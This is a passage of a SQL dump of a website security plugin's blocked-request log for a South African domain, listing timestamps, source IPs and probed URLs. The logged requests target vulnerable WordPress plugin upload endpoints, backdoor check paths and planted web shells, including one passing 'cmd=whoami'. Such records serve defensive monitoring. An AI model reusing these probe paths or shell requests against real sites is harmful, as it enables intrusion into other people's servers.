17:51:19','70.113.86.177','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2152,'2020-07-23 23:35:12','35.239.152.102','http://www.smithandsmith.co.za/wp-content/plugins/real3d-flipbook/css/flipbook-admin.css','404shield',''),(2153,'2020-07-24 01:02:55','45.140.174.112','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(2154,'2020-07-24 03:19:00','157.52.227.202','http://smithandsmith.co.za/wp-content/plugins/contus-hd-flv-player/uploadVideo.php','404shield',''),(2155,'2020-07-24 15:07:58','157.52.227.202','http://smithandsmith.co.za/wp-content/plugins/contus-hd-flv-player/uploadVideo.php','404shield',''),(2156,'2020-07-25 05:28:34','157.52.227.202','http://smithandsmith.co.za/wp-content/plugins/contus-hd-flv-player/uploadVideo.php','404shield',''),(2157,'2020-07-26 02:50:52','35.192.105.61','http://www.smithandsmith.co.za/wp-content/plugins/category-page-icons/css/menu.css','404shield',''),(2158,'2020-07-26 05:57:03','35.192.105.61','http://www.smithandsmith.co.za/wp-content/plugins/real3d-flipbook/css/flipbook-admin.css','404shield',''),(2159,'2020-07-26 15:10:29','45.137.22.60','http://www.smithandsmith.co.za//wp-content/plugins/plugins/GreenGo.php','404shield',''),(2160,'2020-07-26 19:43:44','45.137.22.60','http://smithandsmith.co.za//wp-content/plugins/plugins/GreenGo.php','404shield',''),(2161,'2020-07-27 15:48:31','157.52.227.202','http://smithandsmith.co.za/wp-content/plugins/contus-video-galleryversion-10/upload1.php','404shield',''),(2162,'2020-07-27 21:52:41','34.83.167.53','http://smithandsmith.co.za/wp-content/plugins/real3d-flipbook/css/flipbook-admin.css','404shield',''),(2163,'2020-07-28 13:54:14','157.52.227.202','http://smithandsmith.co.za/wp-content/plugins/contus-hd-flv-player/uploadVideo.php','404shield',''),(2164,'2020-07-28 23:04:07','34.83.167.53','http://www.smithandsmith.co.za/wp-content/plugins/real3d-flipbook/css/flipbook-admin.css','404shield',''),(2165,'2020-08-01 04:19:41','23.228.109.146','http://smithandsmith.co.za/wp-content/plugins/contus-video-galleryversion-10/upload1.php','404shield',''),(2166,'2020-08-01 10:31:01','23.228.109.146','http://smithandsmith.co.za/wp-content/plugins/contus-video-galleryversion-10/upload1.php','404shield',''),(2167,'2020-08-02 19:27:19','148.72.158.226','http://smithandsmith.co.za/wp-login.php','404shield',''),(2168,'2020-08-02 19:27:31','148.72.158.226','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2169,'2020-08-03 01:42:24','23.228.109.146','http://smithandsmith.co.za/wp-content/plugins/contus-video-galleryversion-10/upload1.php','404shield',''),(2170,'2020-08-04 11:28:11','192.200.215.91','http://smithandsmith.co.za/wp-content/plugins/wp-crm/third-party/uploadify/uploadify.css','404shield',''),(2171,'2020-08-05 10:32:29','192.200.215.91','http://smithandsmith.co.za/wp-content/plugins/html5avmanager/lib/uploadify/uploadify.css','404shield',''),(2172,'2020-08-06 12:32:15','192.200.215.91','http://smithandsmith.co.za/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php','404shield',''),(2173,'2020-08-07 01:43:32','192.200.215.91','http://smithandsmith.co.za/wp-content/plugins/mm-forms/includes/doajaxfileupload.php','404shield',''),(2174,'2020-08-07 14:00:04','192.200.215.91','http://smithandsmith.co.za/wp-content/plugins/gallery-plugin/upload/php.php','404shield',''),(2175,'2020-08-07 19:17:46','45.137.22.156','http://www.smithandsmith.co.za//wp-admin/install.php','404shield',''),(2176,'2020-08-08 01:49:03','192.200.215.91','http://smithandsmith.co.za/wp-content/plugins/omni-secure-files/plupload/examples/upload.php','404shield',''),(2177,'2020-08-08 10:23:08','89.36.224.5','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2178,'2020-08-08 10:23:09','89.36.224.5','http://smithandsmith.co.za/administrator/','adminpw',''),(2179,'2020-08-08 10:23:09','89.36.224.5','http://smithandsmith.co.za/administrator/','adminpw',''),(2180,'2020-08-08 13:06:11','45.86.203.192','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2181,'2020-08-08 13:06:11','45.86.203.192','http://smithandsmith.co.za/administrator/','adminpw',''),(2182,'2020-08-08 13:06:12','45.86.203.192','http://smithandsmith.co.za/administrator/','adminpw',''),(2183,'2020-08-09 04:01:32','192.200.215.91','http://smithandsmith.co.za/wp-content/plugins/wpstorecart/php/upload.php','404shield',''),(2184,'2020-08-09 13:25:09','51.79.165.35','http://smithandsmith.co.za//wp-login.php','404shield',''),(2185,'2020-08-10 00:25:13','192.200.215.91','http://smithandsmith.co.za/wp-content/plugins/wp-property/third-party/uploadify/uploadify.css','404shield',''),(2186,'2020-08-10 09:18:15','198.27.69.130','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2187,'2020-08-10 12:09:41','192.200.215.91','http://smithandsmith.co.za/wp-content/plugins/videowhisper-video-presentation/vp/translation.php','404shield',''),(2188,'2020-08-11 01:22:49','192.200.215.91','http://smithandsmith.co.za/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php','404shield',''),(2189,'2020-08-11 09:38:36','105.184.67.204','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(2190,'2020-08-11 13:06:28','192.200.215.91','http://smithandsmith.co.za/wp-content/plugins/uploader/uploadify/uploadify.css','404shield',''),(2191,'2020-08-12 01:38:14','192.200.215.91','http://smithandsmith.co.za/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/ajaxupload.js','404shield',''),(2192,'2020-08-12 12:30:03','45.137.22.156','http://smithandsmith.co.za//wp-admin/install.php','404shield',''),(2193,'2020-08-12 14:01:11','192.200.215.91','http://smithandsmith.co.za/wp-content/plugins/nmedia-user-file-uploader/nm_fileuploader_style.css','404shield',''),(2194,'2020-08-13 01:22:51','192.200.215.91','http://smithandsmith.co.za/wp-content/plugins/nmedia-user-file-uploader-pro-v7.4-HTML5/nm_fileuploader_style.css','404shield',''),(2195,'2020-08-13 12:48:09','192.200.215.91','http://smithandsmith.co.za/wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php','404shield',''),(2196,'2020-08-13 19:41:53','185.222.57.93','http://www.smithandsmith.co.za//wp-content/class.php','404shield',''),(2197,'2020-08-14 12:54:37','192.200.215.91','http://smithandsmith.co.za/wp-content/plugins/pica-photo-gallery/css/style.css','404shield',''),(2198,'2020-08-14 16:33:13','185.222.57.93','http://smithandsmith.co.za//wp-content/class.php','404shield',''),(2199,'2020-08-15 13:58:43','192.200.215.91','http://smithandsmith.co.za/wp-content/plugins/videowhisper-video-conference-integration/vc/flash_detect_min.js','404shield',''),(2200,'2020-08-17 04:37:20','192.200.215.91','http://smithandsmith.co.za/wp-content/plugins/videowhisper-video-conference-integration/vc/vw_upload.php','404shield',''),(2201,'2020-08-18 01:49:56','192.200.215.91','http://smithandsmith.co.za/wp-content/plugins/videowhisper-video-conference-integration/vc/vw_upload.php','404shield',''),(2202,'2020-08-18 13:46:18','192.200.215.91','http://smithandsmith.co.za/wp-content/plugins/image-symlinks/uploadify/uploadify.css','404shield',''),(2203,'2020-08-19 01:44:56','192.200.215.91','http://smithandsmith.co.za/wp-content/plugins/image-symlinks/uploadify/uploadify.css','404shield',''),(2204,'2020-08-19 12:34:11','192.99.14.199','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2205,'2020-08-19 12:36:28','192.99.14.199','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2206,'2020-08-19 12:40:46','192.99.14.199','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2207,'2020-08-19 12:43:00','192.99.14.199','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2208,'2020-08-20 01:39:19','192.200.215.91','http://smithandsmith.co.za/wp-content/plugins/dzs-zoomsounds/admin/upload.php','404shield',''),(2209,'2020-08-20 04:48:09','192.99.14.199','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2210,'2020-08-20 04:49:44','192.99.14.199','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2211,'2020-08-21 06:49:53','23.228.109.146','http://smithandsmith.co.za/wp-content/plugins/dzs-zoomsounds/admin/upload.php','404shield',''),(2212,'2020-08-21 11:38:42','23.228.109.146','http://smithandsmith.co.za/wp-content/plugins/dzs-zoomsounds/admin/upload.php','404shield',''),(2213,'2020-08-22 05:06:56','23.228.109.146','http://smithandsmith.co.za/wp-content/plugins/dzs-zoomsounds/admin/upload.php','404shield',''),(2214,'2020-08-24 08:46:48','217.160.28.161','http://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2215,'2020-08-24 08:47:10','217.160.28.161','http://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','dfishield',''),(2216,'2020-08-24 08:47:39','217.160.28.161','http://smithandsmith.co.za/wp-content/index.php?x=ooo','404shield',''),(2217,'2020-08-25 00:39:06','217.160.28.161','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2218,'2020-08-25 00:39:53','217.160.28.161','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','dfishield',''),(2219,'2020-08-25 00:40:43','217.160.28.161','http://www.smithandsmith.co.za/wp-content/index.php?x=ooo','404shield',''),(2220,'2020-08-25 00:41:46','217.160.28.161','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2221,'2020-08-25 00:42:48','217.160.28.161','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/cqympfzlid.php?x=ooo','404shield',''),(2222,'2020-08-25 00:43:34','217.160.28.161','https://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2223,'2020-08-25 00:44:24','217.160.28.161','https://www.smithandsmith.co.za/wp-content/plugins/ioptimization/cqympfzlid.php?x=ooo','404shield',''),(2224,'2020-08-25 03:22:08','217.160.28.161','http://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2225,'2020-08-25 03:23:23','217.160.28.161','http://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','dfishield',''),(2226,'2020-08-25 03:24:11','217.160.28.161','http://smithandsmith.co.za/wp-content/index.php?x=ooo','404shield',''),(2227,'2020-08-25 03:24:58','217.160.28.161','http://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2228,'2020-08-25 03:26:03','217.160.28.161','http://smithandsmith.co.za/wp-content/plugins/ioptimization/gvqbdhyvsy.php?x=ooo','404shield',''),(2229,'2020-08-25 03:27:19','217.160.28.161','https://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2230,'2020-08-25 03:28:10','217.160.28.161','https://smithandsmith.co.za/wp-content/plugins/ioptimization/gvqbdhyvsy.php?x=ooo','404shield',''),(2231,'2020-08-25 03:29:40','217.160.28.161','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2232,'2020-08-25 03:30:38','217.160.28.161','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/gvqbdhyvsy.php?x=ooo','404shield',''),(2233,'2020-08-27 13:45:21','46.101.1.19','http://smithandsmith.co.za/wp-login.php','404shield',''),(2234,'2020-08-28 00:38:56','51.81.98.68','http://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2235,'2020-08-28 00:39:02','51.81.98.68','http://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','dfishield',''),(2236,'2020-08-28 00:39:09','51.81.98.68','http://smithandsmith.co.za/wp-content/index.php?x=ooo','404shield',''),(2237,'2020-08-29 02:24:44','161.35.127.172','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2238,'2020-08-29 02:24:50','161.35.127.172','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','dfishield',''),(2239,'2020-08-29 02:24:57','161.35.127.172','http://www.smithandsmith.co.za/wp-content/index.php?x=ooo','404shield',''),(2240,'2020-08-29 18:24:07','51.81.98.68','http://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2241,'2020-08-29 18:24:13','51.81.98.68','http://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','dfishield',''),(2242,'2020-08-29 18:24:17','51.81.98.68','http://smithandsmith.co.za/wp-content/index.php?x=ooo','404shield',''),(2243,'2020-08-29 19:52:46','161.35.127.172','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2244,'2020-08-29 19:52:51','161.35.127.172','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','dfishield',''),(2245,'2020-08-29 19:52:57','161.35.127.172','http://www.smithandsmith.co.za/wp-content/index.php?x=ooo','404shield',''),(2246,'2020-08-30 00:24:18','94.130.107.178','http://smithandsmith.co.za//wp-admin/install.php?step=1','404shield',''),(2247,'2020-08-30 00:24:27','94.130.107.178','http://smithandsmith.co.za//wp-admin/setup-config.php','404shield',''),(2248,'2020-08-30 00:24:31','94.130.107.178','http://smithandsmith.co.za/wp-admin/admin-ajax.php','404shield',''),(2249,'2020-08-30 01:15:46','94.130.107.178','http://www.smithandsmith.co.za//wp-admin/install.php?step=1','404shield',''),(2250,'2020-08-30 01:16:00','94.130.107.178','http://www.smithandsmith.co.za//wp-admin/setup-config.php','404shield',''),(2251,'2020-08-30 01:16:09','94.130.107.178','http://www.smithandsmith.co.za/wp-admin/admin-ajax.php','404shield',''),(2252,'2020-08-31 04:07:38','52.249.182.14','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2253,'2020-08-31 04:08:02','52.249.182.14','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','dfishield',''),(2254,'2020-08-31 04:08:15','52.249.182.14','http://www.smithandsmith.co.za/wp-content/index.php?x=ooo','404shield',''),(2255,'2020-09-01 11:08:15','157.230.126.145','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2256,'2020-09-01 11:08:29','157.230.126.145','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','dfishield',''),(2257,'2020-09-01 11:08:45','157.230.126.145','http://www.smithandsmith.co.za/wp-content/index.php?x=ooo','404shield',''),(2258,'2020-09-04 01:40:59','23.228.109.146','http://smithandsmith.co.za/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php','404shield',''),(2259,'2020-09-04 15:04:53','104.131.73.119','http://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2260,'2020-09-05 04:57:17','91.121.183.9','https://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2261,'2020-09-05 04:57:40','91.121.183.9','https://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/files/x.php?cmd=whoami','404shield',''),(2262,'2020-09-05 04:58:09','91.121.183.9','http://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2263,'2020-09-05 06:16:44','40.115.158.144','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2264,'2020-09-05 06:17:05','40.115.158.144','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','dfishield',''),(2265,'2020-09-05 06:17:28','40.115.158.144','http://www.smithandsmith.co.za/wp-content/index.php?x=ooo','404shield',''),(2266,'2020-09-06 01:04:47','142.93.179.79','http://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2267,'2020-09-06 07:55:54','23.228.109.146','http://smithandsmith.co.za/wp-content/plugins/wp-front-end-repository/js/uploadify/uploadify.css','404shield',''),(2268,'2020-09-07 03:34:40','23.228.109.146','http://smithandsmith.co.za/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/css/jquery.lightbox-0.5.css','404shield',''),(2269,'2020-09-08 03:59:17','3.234.210.161','http://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2270,'2020-09-08 04:57:48','23.228.109.146','http://smithandsmith.co.za/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php','404shield',''),(2271,'2020-09-09 01:12:03','23.228.109.146','http://smithandsmith.co.za/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php','404shield',''),(2272,'2020-09-10 01:03:43','23.228.109.146','http://smithandsmith.co.za/wp-content/plugins/front-end-editor/lib/aloha-editor/plugins/extra/draganddropfiles/demo/index.css','404shield',''),(2273,'2020-09-10 06:07:33','51.11.136.167','http://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2274,'2020-09-10 06:07:45','51.11.136.167','http://smithandsmith.co.za/wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php','404shield',''),(2275,'2020-09-10 15:12:40','104.214.24.124','http://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2276,'2020-09-10 15:13:14','104.214.24.124','http://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php','404shield',''),(2277,'2020-09-10 23:46:59','185.81.157.128','http://smithandsmith.co.za/wp-admin/install.php','404shield',''),(2278,'2020-09-11 00:56:12','23.228.109.146','http://smithandsmith.co.za/wp-content/plugins/fluid_forms/file-upload/server/php/index.php','404shield',''),(2279,'2020-09-12 00:25:10','23.228.109.146','http://smithandsmith.co.za/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php','404shield',''),(2280,'2020-09-12 01:20:16','34.71.88.114','http://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/files/','404shield',''),(2281,'2020-09-12 02:14:28','51.11.136.167','http://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2282,'2020-09-12 02:14:33','51.11.136.167','http://smithandsmith.co.za/wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php','404shield',''),(2283,'2020-09-12 03:38:46','138.91.26.228','http://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2284,'2020-09-12 03:39:19','138.91.26.228','http://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2285,'2020-09-12 06:42:00','193.239.147.35','http://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2286,'2020-09-12 10:44:17','104.214.24.124','http://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2287,'2020-09-12 10:44:25','104.214.24.124','http://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php','404shield',''),(2288,'2020-09-12 12:22:05','34.71.88.114','http://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/files/','404shield',''),(2289,'2020-09-12 13:15:54','193.239.147.35','http://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2290,'2020-09-12 18:52:42','34.121.160.120','http://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/files/hardfork.php','404shield',''),(2291,'2020-09-12 23:05:33','34.121.160.120','http://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/files/hardfork.php.suspected','404shield',''),(2292,'2020-09-13 03:57:13','23.228.109.146','http://smithandsmith.co.za/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.css','404shield',''),(2293,'2020-09-13 06:51:28','34.121.160.120','http://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/files/hardfork.php.suspected','404shield',''),(2294,'2020-09-13 14:30:12','34.121.160.120','http://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/files/hardfork.php.suspected','404shield',''),(2295,'2020-09-13 22:35:22','52.188.2.186','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2296,'2020-09-13 22:35:42','52.188.2.186','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','dfishield',''),(2297,'2020-09-13 22:36:13','52.188.2.186','http://www.smithandsmith.co.za/wp-content/index.php?x=ooo','404shield',''),(2298,'2020-09-13 23:50:09','157.55.192.39','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2299,'2020-09-13 23:50:29','157.55.192.39','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','dfishield',''),(2300,'2020-09-13 23:51:11','157.55.192.39','http://www.smithandsmith.co.za/wp-content/index.php?x=ooo','404shield',''),(2301,'2020-09-13 23:51:35','157.55.192.39','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2302,'2020-09-13 23:52:05','157.55.192.39','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/vmcitbmjsn.php?x=ooo','404shield',''),(2303,'2020-09-14 01:01:35','23.228.109.146','http://smithandsmith.co.za/wp-content/plugins/formcraft/file-upload/server/php/upload.php','404shield',''),(2304,'2020-09-14 19:15:31','193.239.147.35','http://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2305,'2020-09-15 01:23:16','23.228.109.146','http://smithandsmith.co.za/wp-content/plugins/formcraft/file-upload/server/content/upload.php','404shield',''),(2306,'2020-09-15 03:49:16','193.239.147.35','http://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2307,'2020-09-15 03:49:53','193.239.147.35','http://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','dfishield',''),(2308,'2020-09-15 03:50:31','193.239.147.35','http://smithandsmith.co.za/wp-content/index.php?x=ooo','404shield',''),(2309,'2020-09-15 03:51:07','193.239.147.35','http://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2310,'2020-09-15 03:51:43','193.239.147.35','http://smithandsmith.co.za/wp-content/plugins/ioptimization/pzzsviuriz.php?x=ooo','404shield',''),(2311,'2020-09-15 03:52:21','193.239.147.35','https://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2312,'2020-09-15 03:53:03','193.239.147.35','https://smithandsmith.co.za/wp-content/plugins/ioptimization/pzzsviuriz.php?x=ooo','404shield',''),(2313,'2020-09-15 03:53:31','193.239.147.35','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2314,'2020-09-15 03:53:57','193.239.147.35','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/pzzsviuriz.php?x=ooo','404shield',''),(2315,'2020-09-15 10:05:59','70.37.95.151','http://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2316,'2020-09-16 01:43:22','23.228.109.146','http://smithandsmith.co.za/wp-content/plugins/formcraft/file-upload/server/php/index.php','404shield',''),(2317,'2020-09-17 02:11:09','23.228.109.146','http://smithandsmith.co.za/wp-content/plugins/simple-ads-manager/css/jslider.round.plastic.css','404shield',''),(2318,'2020-09-17 02:36:09','52.152.161.52','http://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/files/coder.php','404shield',''),(2319,'2020-09-17 03:53:16','34.67.5.18','http://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2320,'2020-09-17 15:32:16','75.119.215.210','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(2321,'2020-09-18 02:02:04','23.228.109.146','http://smithandsmith.co.za/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/js/main.js','404shield',''),(2322,'2020-09-18 02:56:25','34.69.185.13','http://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/files/','404shield',''),(2323,'2020-09-19 00:18:29','34.69.185.13','http://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/files/hardfork.php','404shield',''),(2324,'2020-09-19 00:24:00','217.160.60.249','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2325,'2020-09-19 00:24:02','217.160.60.249','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2326,'2020-09-19 00:24:03','217.160.60.249','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2327,'2020-09-19 00:30:42','34.69.185.13','http://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/files/hardfork.php.suspected','404shield',''),(2328,'2020-09-19 02:19:06','23.228.109.146','http://smithandsmith.co.za/wp-content/themes/bordeaux-theme/style.css','404shield',''),(2329,'2020-09-19 08:42:25','34.69.185.13','http://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/files/','404shield',''),(2330,'2020-09-19 22:44:07','217.69.8.152','http://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2331,'2020-09-19 22:44:16','217.69.8.152','http://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','dfishield',''),(2332,'2020-09-19 22:44:23','217.69.8.152','http://smithandsmith.co.za/wp-content/index.php?x=ooo','404shield',''),(2333,'2020-09-20 11:56:41','23.228.109.146','http://smithandsmith.co.za/wp-content/themes/botanica-theme/style.css','404shield',''),(2334,'2020-09-22 05:10:14','210.116.66.18','http://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2335,'2020-09-22 06:58:39','23.228.109.146','http://smithandsmith.co.za/wp-content/themes/bordeaux-theme/style.css','404shield',''),(2336,'2020-09-22 08:52:40','210.116.66.18','http://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2337,'2020-09-22 12:20:51','52.191.189.177','http://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2338,'2020-09-22 12:20:54','52.191.189.177','http://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php','404shield',''),(2339,'2020-09-22 12:21:57','52.191.189.177','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2340,'2020-09-22 18:54:59','62.210.139.92','https://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2341,'2020-09-22 18:54:59','62.210.139.92','https://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2342,'2020-09-23 01:01:22','23.228.109.146','http://smithandsmith.co.za/wp-content/themes/botanica-theme/style.css','404shield',''),(2343,'2020-09-24 01:05:37','23.228.109.146','http://smithandsmith.co.za/wp-content/themes/bulteno-theme/functions/Readme!.txt','404shield',''),(2344,'2020-09-24 07:08:58','92.244.246.184','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(2345,'2020-09-24 07:08:58','92.244.246.184','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(2346,'2020-09-25 00:15:25','92.244.246.184','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(2347,'2020-09-25 00:15:26','92.244.246.184','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(2348,'2020-09-25 01:11:00','23.228.109.146','http://smithandsmith.co.za/wp-content/themes/kernel-theme/style.css','404shield',''),(2349,'2020-09-26 01:45:11','23.228.109.146','http://smithandsmith.co.za/wp-content/themes/oxygen-theme/style.css','404shield',''),(2350,'2020-09-27 00:28:55','210.116.66.18','http://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2351,'2020-09-27 03:54:21','210.116.66.18','http://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2352,'2020-09-27 11:40:09','23.228.109.146','http://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2353,'2020-09-27 16:52:54','20.58.0.53','http://smithandsmith.co.za/wp-login.php','404shield',''),(2354,'2020-09-27 18:24:27','23.228.109.146','http://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/files/','404shield',''),(2355,'2020-09-27 22:20:04','13.90.25.234','https://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2356,'2020-09-27 22:20:31','13.90.25.234','https://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','dfishield',''),(2357,'2020-09-27 22:21:00','13.90.25.234','https://www.smithandsmith.co.za/wp-content/index.php?x=ooo','404shield',''),(2358,'2020-09-28 00:27:04','52.247.2.163','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2359,'2020-09-28 00:29:40','52.247.2.163','http://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2360,'2020-09-28 03:46:12','23.228.109.146','http://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2361,'2020-09-28 04:09:25','69.10.58.29','http://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2362,'2020-09-28 